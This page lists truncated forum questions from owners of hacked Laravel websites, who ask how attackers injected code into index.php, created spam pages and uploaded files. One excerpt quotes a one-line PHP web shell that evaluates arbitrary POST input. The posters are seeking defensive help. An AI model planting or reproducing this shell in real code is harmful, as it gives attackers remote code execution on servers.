How to secure Laravel website against the ongoing massive exploitation

My website built upon Laravel is currently under attack.
Only the index.php file was changed, and by that I mean that every line of code is inserted above the original Laravel code. So this code executes before the legitimate Laravel code…. Continue reading How to secure Laravel website against the ongoing massive exploitation

My Website Hacked! Needs Possible Reasons and Solutions [duplicate]

My website is built in Laravel 8. After some time multiple fake pages were created by someone. How he got access I don’t know. pages like (example.com/free-dating-site). These are all pages indexed by Google. There are many pages but when … Continue reading My Website Hacked! Needs Possible Reasons and Solutions [duplicate]

Need guidance on detecting how a hacked file got upload on my website [duplicate]

On my website I found a file containing this code
<?php if(isset($_POST[z]))eval($_POST[z]);?>

It’s my understanding that the hacker is using this to execute any PHP command send via a POST request.
I’m trying to see how this file g… Continue reading Need guidance on detecting how a hacked file got upload on my website [duplicate]